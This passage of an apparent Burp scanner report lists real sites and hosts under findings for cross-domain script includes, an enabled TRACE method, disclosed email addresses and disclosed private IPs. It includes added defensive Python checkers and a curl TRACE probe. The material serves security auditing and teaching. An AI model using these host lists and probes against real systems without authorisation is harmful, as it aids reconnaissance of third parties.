16.28. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.29. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.30. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.31. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.32. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.33. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.34. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.35. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.36. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.37. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.38. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.39. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.40. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.41. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.42. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.43. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.44. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.45. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.46. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.47. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.48. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.49. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.50. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.51. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.52. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.53. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.54. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.55. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.56. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.57. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.58. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.59. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.60. http://radiumone.com/

16.61. http://reviews.homedepot.com/1999q/202642971/reviews.htm

16.62. http://reviews.homedepot.com/1999s/202642971/reviews.htm

16.63. http://rs.gwallet.com/r1/pixel/x9r8101111

16.64. http://rs.gwallet.com/r1/pixel/x9r8962146

16.65. http://search.cnbc.com/main.do

16.66. http://soundcloud.com/

16.67. http://soundcloud.com/help

16.68. http://soundcloud.com/help/premium-accounts

16.69. http://soundcloud.com/premium

16.70. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

16.71. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

16.72. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

16.73. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

16.74. http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/

16.75. http://www.cnbc.com/

16.76. http://www.cnbc.com/id/43422860

16.77. http://www.creditcards.com/0-apr-credit-cards.php

16.78. http://www.creditcards.com/instant-approval.php

16.79. http://www.egov.com/Pages/default.aspx

16.80. http://www.egov.com/Solutions/Funding/Pages/default.aspx

16.81. http://www.egov.com/Solutions/Pages/default.aspx

16.82. http://www.facebook.com/plugins/like.php

16.83. http://www.facebook.com/plugins/recommendations.php

16.84. http://www.facebook.com/widgets/recommendations.php

16.85. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

16.86. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

16.87. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation

16.88. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate

16.89. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay

16.90. http://www.ilslaunch.com/mission-control/mission-skyterra-1

16.91. http://www.lightsquared.com/press-room/press-releases/lightsquared-and-cellular-south-announce-they-have-entered-into-a-bilateral-roaming-agreement/

16.92. http://www.lightsquared.com/uncategorized/welcome-to-insights/
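
Every entry in the "Cross-domain script include" category above is a page that executes JavaScript fetched from another origin with the page's full privileges, so each listed host is a trust dependency rather than a bug in itself. The check a reviewer wants is the list of foreign script origins per page, whether each is loaded over plain http, and whether an integrity attribute pins the content. The script below is an added example, not part of the XSS.CX report or Burp's own logic; the sample page and all hostnames in it are constructed for illustration.

```python
"""Find cross-domain <script src=...> includes in an HTML document.

Added example (not part of the XSS.CX/Burp report). The sample HTML and
the hostnames in it are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptCollector(HTMLParser):
    """Collect the src of every <script> tag and whether it carries integrity=."""

    def __init__(self):
        super().__init__()
        self.scripts = []  # list of (src, has_integrity)

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = dict(attrs)
        src = a.get("src")
        if src:
            self.scripts.append((src, "integrity" in a))


def origin_of(url):
    """Return (scheme, host, port) for url; port defaults per scheme."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port or (443 if scheme == "https" else 80)
    return (scheme, (parts.hostname or "").lower(), port)


def cross_domain_scripts(page_url, html):
    """Return script includes whose origin differs from page_url's origin.

    Relative and protocol-relative (//host/x.js) srcs are resolved against
    the page URL first, so a //cdn include on an http page is reported as
    plaintext. Each finding records the resolved URL, the host, whether it
    is fetched over plain http, and whether Subresource Integrity is set.
    """
    parser = _ScriptCollector()
    parser.feed(html)
    page_origin = origin_of(page_url)
    findings = []
    for src, has_sri in parser.scripts:
        resolved = urljoin(page_url, src)
        scheme, host, _ = origin_of(resolved)
        if origin_of(resolved) == page_origin:
            continue
        findings.append({
            "url": resolved,
            "host": host,
            "plaintext": scheme == "http",
            "sri": has_sri,
        })
    return findings


# Constructed sample page; every host below is hypothetical.
SAMPLE_PAGE_URL = "http://www.example.test/id/43422860"
SAMPLE_HTML = """
<html><head>
<script src="/js/site.js"></script>
<script src="http://www.example.test/js/quote_components.js"></script>
<script src="//ads.adnetwork.test/serve/v=5"></script>
<script src="https://cdn.widgets.test/lib.js"
        integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script>inline()</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for f in cross_domain_scripts(SAMPLE_PAGE_URL, SAMPLE_HTML):
        note = ("  (plain http)" if f["plaintext"] else "") + ("" if f["sri"] else "  (no SRI)")
        print(f"{f['host']:24} {f['url']}{note}")
```

Same-origin includes (the first two script tags in the sample) are dropped; the two foreign hosts are reported, one fetched over plain http without integrity, the other over https with an integrity attribute. Integrity only helps for static files, which is why ad-serving endpoints that change per request, like most of the hosts in the list above, cannot be pinned that way.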

17. TRACE method is enabled

17.1. http://ads.cleveland.com/

17.2. http://ads.nj.com/

17.3. http://ads.oregonlive.com/

17.4. http://ads1.msn.com/

17.5. http://am.nexac.com/

17.6. http://amch.questionmarket.com/

17.7. http://cache.specificmedia.com/

17.8. http://cheetah.vizu.com/

17.9. http://dsp.adledge.com/

17.10. http://image2.pubmatic.com/

17.11. http://login.dotomi.com/

17.12. http://matcher-apx.bidder7.mookie1.com/

17.13. http://matcher.bidder7.mookie1.com/

17.14. http://matcher.bidder8.mookie1.com/

17.15. http://optimized-by.rubiconproject.com/

17.16. http://pixel.everesttech.net/

17.17. http://pixel.rubiconproject.com/

17.18. http://puma.vizu.com/

17.19. http://rt.legolas-media.com/

17.20. http://secure-us.imrworldwide.com/

17.21. http://spotlight.creditcards.com/

17.22. http://t.mookie1.com/

17.23. http://tacoda.at.atwola.com/

17.24. http://tap.rubiconproject.com/

17.25. http://tracking.hubspot.com/

17.26. http://www.lightsquared.com/

17.27. http://www.nutter.com/
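
A server that honours TRACE echoes the request it received, headers included, back to the client in a message/http body. The concern behind this finding is Cross-Site Tracing: if script in the victim's browser can be made to issue TRACE, the echo exposes headers the script cannot normally read, such as Cookie. Current browsers refuse to send TRACE from XMLHttpRequest and fetch, so a positive result on the hosts above is a hardening item rather than a directly exploitable bug. The checker below is an added example, not part of the XSS.CX report or Burp; it confirms the finding by looking for its own marker header in the echo rather than trusting a 200 status alone, and, to run offline, it starts two loopback test servers, one that implements TRACE and one that does not.

```python
"""Check whether an HTTP server answers the TRACE method.

Added example (not part of the XSS.CX/Burp report). The two local test
servers are constructed for the demonstration; point trace_enabled() at
a real host and port to probe it.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def trace_enabled(host, port, path="/", timeout=5.0):
    """Return True if TRACE answers 200 with message/http and echoes our marker.

    Requiring the echoed marker header avoids counting a server that
    answers 200 to every method as TRACE-enabled.
    """
    marker = "X-Trace-Probe"
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("TRACE", path, headers={marker: "probe-1"})
        resp = conn.getresponse()
        body = resp.read().decode("latin-1", "replace")
    finally:
        conn.close()
    if resp.status != 200:
        return False
    ctype = (resp.getheader("Content-Type") or "").lower()
    return ctype.startswith("message/http") and f"{marker}: probe-1" in body


class _NoTraceHandler(BaseHTTPRequestHandler):
    """Test server that only implements GET; the base class answers 501 to TRACE."""

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):  # keep the demo quiet
        pass


class _TraceHandler(_NoTraceHandler):
    """Test server that echoes the request the way a TRACE-enabled server does."""

    def do_TRACE(self):
        hdrs = "".join(f"{k}: {v}\r\n" for k, v in self.headers.items())
        echo = f"{self.requestline}\r\n{hdrs}\r\n".encode("latin-1")
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(echo)))
        self.end_headers()
        self.wfile.write(echo)


def start_test_server(handler):
    """Serve handler on a free loopback port in a daemon thread; return the port."""
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_port


if __name__ == "__main__":
    for name, handler in (("trace-on", _TraceHandler), ("trace-off", _NoTraceHandler)):
        port = start_test_server(handler)
        print(f"{name}: TRACE enabled = {trace_enabled('127.0.0.1', port)}")
```

The same probe by hand is `curl -i -X TRACE -H 'X-Trace-Probe: probe-1' http://host/`; the finding is confirmed when the marker header comes back in the response body. The fix is server-side (for Apache, `TraceEnable off`), and a reverse proxy or CDN in front of the origin may answer TRACE differently from the origin itself, so test the hostname that clients actually reach.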

18. Email addresses disclosed

18.1. http://ads1.msn.com/library/dap.js

18.2. http://control.radiumone.com/gwallet-network-admin/com.gwallet.network.admin.NetworkAdminApp/E28F87B1547ED2D93778B6C7B663A9A5.cache.html

18.3. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm

18.4. http://radiumone.com/mobile/index.html

18.5. http://radiumone.com/network/index.html

18.6. http://radiumone.com/social/developer.html

18.7. http://s.wsj.net/djscript/j_global.js

18.8. https://services.wsj.com/Gryphon/javascripts/djcheck.js

18.9. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0004/provided/j_global_slim/version/20110524192024.js

18.10. http://sj.wsj.net/djscript/require/j_global_slim/version/20110615092718.js

18.11. http://soundcloud.com/premium

18.12. http://www.capitalone.com/css/footer.css

18.13. http://www.capitalone.com/css/framework/base.css

18.14. http://www.capitalone.com/css/framework/grid.css

18.15. http://www.capitalone.com/css/framework/print.css

18.16. http://www.capitalone.com/css/header.css

18.17. http://www.capitalone.com/css/page-nav-heading.css

18.18. http://www.capitalone.com/css/page-type/product.css

18.19. http://www.creditcards.com/javascript/s_code.js

18.20. http://www.egov.com/Scripts/jquery.pngFix.js

18.21. http://www.egov.com/Solutions/Funding/Pages/default.aspx

18.22. http://www.egov.com/Solutions/Pages/default.aspx

18.23. http://www.homedepot.com/static/scripts/jquery/jquery.pubsub.js

18.24. http://www.homedepot.com/wcsstore/hdus/en_US/styles/jquery.fancybox-1.3.4.css

18.25. http://www.homedepot.com/wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js

18.26. http://www.homedepot.com/wcsstore/hdus/scripts/jquery.cookie.js

18.27. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate

18.28. http://www.ilslaunch.com/sites/default/files/js/js_2518332c0b755f1d85c27c9500834ae3.js

18.29. http://www.inlandbusinesslaw.com/attorneyprofiles.html

18.30. http://www.inlandbusinesslaw.com/contactus.html

18.31. http://www.inlandbusinesslaw.com/scripts/user.js

18.32. http://www.lightsquared.com/contact-us/

18.33. http://www.lightsquared.com/press-room/press-releases/lightsquared-and-cellular-south-announce-they-have-entered-into-a-bilateral-roaming-agreement/

18.34. http://www.lightsquared.com/wp-content/themes/lightsquared/js/lightsquared.js
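
The "Email addresses disclosed" category above and the "Private IP addresses disclosed" category that follows are both pattern matches over response content, and both need triage: many of the e-mail hits above sit in third-party library files (jquery.pngFix.js, DD_belatedPNG, jquery.cookie.js), where the address is the library author's credit rather than a target employee, and a dotted quad in a script can be a version string rather than an internal host. The filter below is an added example, not part of the XSS.CX report or Burp; it serves both categories, keeps the RFC 1918, loopback and link-local ranges explicit instead of relying on the broader ipaddress.is_private, and flags the library-credit case. The sample responses, addresses and hostnames are constructed.

```python
"""Post-filter for e-mail and private-IP disclosures in response bodies.

Added example (not part of the XSS.CX/Burp report). The sample responses
below are constructed; every address and hostname in them is hypothetical.
"""
import ipaddress
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

# RFC 1918 plus loopback and link-local; kept explicit because
# ipaddress.is_private also covers documentation and reserved ranges.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Library headers carry author credits; those are not the target's staff.
LIBRARY_CREDIT_HINTS = ("jquery", "belatedpng", "pngfix", "@license", "copyright")


def find_emails(body):
    """Return the distinct e-mail addresses in body, sorted."""
    return sorted(set(EMAIL_RE.findall(body)))


def find_private_ips(body):
    """Return private IPv4 addresses in body, sorted by address.

    Malformed quads such as 10.0.0.256 fail ipaddress parsing and are
    dropped; public addresses are dropped by the range check. A version
    string that happens to fall in 10/8 still matches and must be judged
    from context, which is why triage() reports the URL alongside it.
    """
    found = set()
    for m in IPV4_RE.findall(body):
        try:
            ip = ipaddress.ip_address(m)
        except ValueError:
            continue
        if any(ip in net for net in PRIVATE_NETS):
            found.add(str(ip))
    return sorted(found, key=ipaddress.ip_address)


def triage(url, body):
    """Classify one response: its findings and whether the e-mail hit looks like a credit."""
    emails = find_emails(body)
    ips = find_private_ips(body)
    lowered = body.lower()
    is_library = url.lower().endswith((".js", ".css")) and any(
        h in lowered for h in LIBRARY_CREDIT_HINTS)
    return {
        "url": url,
        "emails": emails,
        "private_ips": ips,
        "likely_library_credit": bool(emails) and is_library,
    }


# Constructed sample responses (hypothetical hosts and addresses).
SAMPLES = {
    "http://www.example.test/scripts/jquery.pngFix.js":
        "/* jQuery pngFix plugin (c) 2007 lib.author@example.test */\n"
        "var v='10.1.2.3'; // version string, not a host: a false positive to triage",
    "http://check.example.test/ajax/v6.php":
        '{"server":"10.32.41.7","alt":"172.20.9.250","pub":"203.0.113.8","bad":"10.0.0.256"}',
    "http://www.example.test/contact-us/":
        "Press inquiries: press@example.test, careers: jobs@example.test",
}

if __name__ == "__main__":
    for url, body in SAMPLES.items():
        r = triage(url, body)
        tag = "  [library credit]" if r["likely_library_credit"] else ""
        print(f"{url}\n  emails={r['emails']} private_ips={r['private_ips']}{tag}")
```

Of the three constructed responses, only the contact page carries addresses worth reporting as a disclosure, the script file is flagged as a library credit (and its private-IP hit is a version string), and the JSON endpoint is the real private-IP case, two internal hosts named in a public response.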

19. Private IP addresses disclosed

19.1. http://check4.facebook.com/ajax/v6.php

19.2. http://check4.facebook.com/ajax/v6.php

19.3. http://check4.facebook.com/ajax/v6.php

19.4. http://check4.facebook.com/ajax/v6.php

19.5. http://check4.facebook.com/ajax/v6.php

19.6. http://check4.facebook.com/ajax/v6.php

19.7. http://check4.facebook.com/ajax/v6.php

19.8. http://check4.facebook.com/ajax/v6.php

19.9. http://check4.facebook.com/ajax/v6.php

19.10. http://check4.facebook.com/ajax/v6.php

19.11. http://check4.facebook.com/ajax/v6.php

19.12. http://check4.facebook.com/ajax/v6.php

19.13. http://check4.facebook.com/ajax/v6.php

19.14. http://check4.facebook.com/ajax/v6.php

19.15. http://check4.facebook.com/ajax/v6.php

19.16. http://check4.facebook.com/ajax/v6.php

19.17. http://check4.facebook.com/ajax/v6.php

19.18. http://check4.facebook.com/ajax/v6.php

19.19. http://check4.facebook.com/ajax/v6.php

19.20. http://check4.facebook.com/ajax/v6.php

19.21. http://check4.facebook.com/ajax/v6.php

19.22. http://check4.facebook.com/ajax/v6.php

19.23. http://check4.facebook.com/ajax/v6.php

19.24. http://check4.facebook.com/ajax/v6.php

19.25. http://check4.facebook.com/ajax/v6.php

19.26. http://check4.facebook.com/ajax/v6.php

19.27. http://check4.facebook.com/ajax/v6.php

19.28. http://check4.facebook.com/ajax/v6.php

19.29. http://check4.facebook.com/ajax/v6.php

19.30. http://check4.facebook.com/ajax/v6.php

19.31. http://check4.facebook.com/ajax/v6.php

19.32. http://check4.facebook.com/ajax/v6.php

19.33. http://check4.facebook.com/ajax/v6.php

19.34. http://check4.facebook.com/ajax/v6.php

19.35. http://check4.facebook.com/ajax/v6.php

19.36. http://check4.facebook.com/ajax/v6.php

19.37. http://check4.facebook.com/ajax/v6.php

19.38. http://check4.facebook.com/ajax/v6.php

19.39. http://check4.facebook.com/ajax/v6.php

19.40. http://check4.facebook.com/ajax/v6.php

19.41. http://check4.facebook.com/ajax/v6.php

19.42. http://check4.facebook.com/ajax/v6.php

19.43. http://check4.facebook.com/ajax/v6.php

19.44. http://check4.facebook.com/ajax/v6.php

19.45. http://check4.facebook.com/ajax/v6.php

19.46. http://check4.facebook.com/ajax/v6.php

19.47. http://check4.facebook.com/ajax/v6.php

19.48. http://check4.facebook.com/ajax/v6.php

19.49. http://check4.facebook.com/ajax/v6.php

19.50. http://check4.facebook.com/ajax/v6.php

19.51. http://check4.facebook.com/ajax/v6.php

19.52. http://check4.facebook.com/ajax/v6.php

19.53. http://check4.facebook.com/ajax/v6.php

19.54. http://check4.facebook.com/ajax/v6.php

19.55. http://check4.facebook.com/ajax/v6.php

19.56. http://check4.facebook.com/ajax/v6.php

19.57. http://check4.facebook.com/ajax/v6.php

19.58. http://check4.facebook.com/ajax/v6.php

19.59. http://check4.facebook.com/ajax/v6.php

19.60. http://check4.facebook.com/ajax/v6.php

19.61. http://check4.facebook.com/ajax/v6.php

19.62. http://check4.facebook.com/ajax/v6.php

19.63. http://check4.facebook.com/ajax/v6.php

19.64. http://check4.facebook.com/ajax/v6.php

19.65. http://check4.facebook.com/ajax/v6.php

19.66. http://check4.facebook.com/ajax/v6.php

19.67. http://check4.facebook.com/ajax/v6.php

19.68. http://check4.facebook.com/ajax/v6.php

19.69. http://check4.facebook.com/ajax/v6.php

19.70. http://check4.facebook.com/ajax/v6.php

19.71. http://check4.facebook.com/ajax/v6.php

19.72. http://check4.facebook.com/ajax/v6.php

19.73. http://check4.facebook.com/ajax/v6.php

19.74. http://check4.facebook.com/ajax/v6.php

19.75. http://check4.facebook.com/ajax/v6.php

19.76. http://check4.facebook.com/ajax/v6.php

19.77. http://check4.facebook.com/ajax/v6.php

19.78. http://check4.facebook.com/ajax/v6.php

19.79. http://check4.facebook.com/ajax/v6.php

19.80. http://check4.facebook.com/ajax/v6.php

19.81. http://check4.facebook.com/ajax/v6.php

19.82. http://check4.facebook.com/ajax/v6.php

19.83. http://check4.facebook.com/ajax/v6.php

19.84. http://check4.facebook.com/ajax/v6.php

19.85. http://check4.facebook.com/ajax/v6.php

19.86. http://check4.facebook.com/ajax/v6.php

19.87. http://check4.facebook.com/ajax/v6.php

19.88. http://check4.facebook.com/ajax/v6.php

19.89. http://check4.facebook.com/ajax/v6.php

19.90. http://check4.facebook.com/ajax/v6.php

19.91. http://check4.facebook.com/ajax/v6.php

19.92. http://check4.facebook.com/ajax/v6.php

19.93. http://check4.facebook.com/ajax/v6.php

19.94. http://check4.facebook.com/ajax/v6.php

19.95. http://check4.facebook.com/ajax/v6.php

19.96. http://check4.facebook.com/ajax/v6.php

19.97. http://check4.facebook.com/ajax/v6.php

19.98. http://check4.facebook.com/ajax/v6.php

19.99. http://check4.facebook.com/ajax/v6.php

19.100. http://check4.facebook.com/ajax/v6.php

19.101. http://check4.facebook.com/ajax/v6.php

19.102. http://check4.facebook.com/ajax/v6.php

19.103. http://check4.facebook.com/ajax/v6.php

19.104. http://check4.facebook.com/ajax/v6.php

19.105. http://check4.facebook.com/ajax/v6.php

19.106. http://check4.facebook.com/ajax/v6.php

19.107. http://check4.facebook.com/ajax/v6.php

19.108. http://check4.facebook.com/ajax/v6.php

19.109. http://check4.facebook.com/ajax/v6.php

19.110. http://check4.facebook.com/ajax/v6.php

19.111. http://check4.facebook.com/ajax/v6.php

19.112. http://check4.facebook.com/ajax/v6.php

19.113. http://check4.facebook.com/ajax/v6.php

19.114. http://check4.facebook.com/ajax/v6.php

19.115. http://check4.facebook.com/ajax/v6.php

19.116. http://check4.facebook.com/ajax/v6.php

19.117. http://check4.facebook.com/ajax/v6.php

19.118. http://check4.facebook.com/ajax/v6.php

19.119. http://check4.facebook.com/ajax/v6.php

19.120. http://check4.facebook.com/ajax/v6.php

19.121. http://check4.facebook.com/ajax/v6.php

19.122. http://check4.facebook.com/ajax/v6.php

19.123. http://check4.facebook.com/ajax/v6.php

19.124. http://check4.facebook.com/ajax/v6.php

19.125. http://check4.facebook.com/ajax/v6.php

19.126. http://check4.facebook.com/ajax/v6.php

19.127. http://check4.facebook.com/ajax/v6.php

19.128. http://check4.facebook.com/ajax/v6.php

19.129. http://check4.facebook.com/ajax/v6.php

19.130. http://check4.facebook.com/ajax/v6.php

19.131. http://check4.facebook.com/ajax/v6.php

19.132. http://check4.facebook.com/ajax/v6.php

19.133. http://check4.facebook.com/ajax/v6.php

19.134. http://check4.facebook.com/ajax/v6.php

19.135. http://check4.facebook.com/ajax/v6.php

19.136. http://check4.facebook.com/ajax/v6.php

19.137. http://check4.facebook.com/ajax/v6.php

19.138. http://check4.facebook.com/ajax/v6.php

19.139. http://check4.facebook.com/ajax/v6.php

19.140. http://check4.facebook.com/ajax/v6.php

19.141. http://check4.facebook.com/ajax/v6.php

19.142. http://check4.facebook.com/ajax/v6.php

19.143. http://check4.facebook.com/ajax/v6.php

19.144. http://check4.facebook.com/ajax/v6.php

19.145. http://check4.facebook.com/ajax/v6.php

19.146. http://check4.facebook.com/ajax/v6.php

19.147. http://check4.facebook.com/ajax/v6.php

19.148. http://check4.facebook.com/ajax/v6.php

19.149. http://check4.facebook.com/ajax/v6.php

19.150. http://check4.facebook.com/ajax/v6.php

19.151. http://check4.facebook.com/ajax/v6.php

